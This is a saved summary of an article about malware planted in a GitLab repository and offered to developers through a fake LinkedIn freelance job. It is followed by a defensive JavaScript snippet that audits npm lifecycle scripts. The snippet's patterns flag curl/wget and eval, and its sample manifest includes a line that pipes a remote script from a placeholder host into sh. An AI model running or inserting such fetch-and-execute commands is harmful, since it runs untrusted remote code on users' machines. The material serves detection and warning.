Saved February 14, 2026
The article details a targeted malware attack disguised as a freelance job opportunity on LinkedIn. It breaks down how the malicious code was embedded in a GitLab repository and outlines key warning signs for developers to watch for to avoid similar scams.
On January 21, 2026, a LinkedIn message about a lucrative freelance opportunity led to a significant security breach. The sender, "Rajinder Mudhar," posed as a Branch Manager at a legitimate company but had a suspicious profile with 500+ connections and no posts. The message contained a link to a GitLab repository that appeared to host a real estate platform's code. However, this was a front for malware embedded within a seemingly legitimate Node.js application, designed to steal credentials and establish a command-and-control connection.
Several red flags indicated the scam. The LinkedIn profile had no activity despite a large number of connections, and the scheduled call with the supposed Tech Manager, Jack Murray, was a no-show. The GitLab repository had only two commits, which is atypical for production-ready software and suggested a deliberate attempt to conceal its history. An initial AI review deemed the app "good looking," failing to detect the hidden malware until a security-focused analysis was performed. The malicious code included an auto-execution hook and obfuscated loaders that fetched additional payloads from a remote server, allowing attackers to execute arbitrary commands and exfiltrate sensitive files.
The malware had three main components: a command-and-control backdoor, a file exfiltration module, and a clipboard stealer. The backdoor connected to a remote server, allowing attackers to gather system information and execute commands. The file exfiltration module scanned for sensitive files on the system, while the clipboard stealer monitored and transmitted clipboard data to the attackers. The incident highlights the importance of scrutinizing LinkedIn profiles and code repositories for signs of malicious activity, especially in freelance engagements.
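One way to check a cloned Node.js project for an auto-execution hook before installing it, as an added example (not code from the article or from the repository it describes). It assumes the hook is an npm lifecycle script in `package.json`, which the summary does not specify; `auditManifest`, the heuristics and the sample manifest are constructed for illustration.

```javascript
// npm runs these scripts on its own during `npm install`.
// Assumption: the page does not say which kind of auto-execution hook was used.
const AUTO_RUN = ["preinstall", "install", "postinstall", "prepare"];

// Heuristic labels for script commands that deserve a manual read.
const RISKY = [
  { name: "runs-node-file", re: /\bnode\s+\S+/ },
  { name: "inline-eval", re: /\bnode\s+(-e|--eval)\b/ },
  { name: "network-fetch", re: /\b(curl|wget)\b|https?:\/\// },
  { name: "shell-chain", re: /&&|;|\|/ },
];

// Labels that make a script worth flagging even when it is not auto-run.
const ALWAYS_FLAG = new Set(["inline-eval", "network-fetch"]);

// Takes a parsed package.json object and returns the scripts to review,
// auto-run hooks first. It never executes anything from the project.
function auditManifest(manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  const findings = [];
  for (const [script, command] of Object.entries(scripts)) {
    if (typeof command !== "string") continue;
    const autoRun = AUTO_RUN.includes(script);
    const reasons = RISKY.filter((r) => r.re.test(command)).map((r) => r.name);
    if (autoRun || reasons.some((r) => ALWAYS_FLAG.has(r))) {
      findings.push({ script, command, autoRun, reasons });
    }
  }
  return findings.sort((a, b) => Number(b.autoRun) - Number(a.autoRun));
}

// Constructed sample manifest (not taken from the repository in the article).
const sampleManifest = {
  name: "sample-real-estate-app",
  scripts: {
    start: "node server.js",
    prepare: "node ./config/setup.js",
    test: "jest",
    build: "curl -s https://example.invalid/build.sh | sh",
  },
};

for (const f of auditManifest(sampleManifest)) {
  const kind = f.autoRun ? "AUTO-RUN" : "manual";
  console.log(`[${kind}] ${f.script}: ${f.command} (${f.reasons.join(", ")})`);
}
```

Read every file a flagged script points to before running anything; `npm install --ignore-scripts` installs dependencies without executing lifecycle scripts.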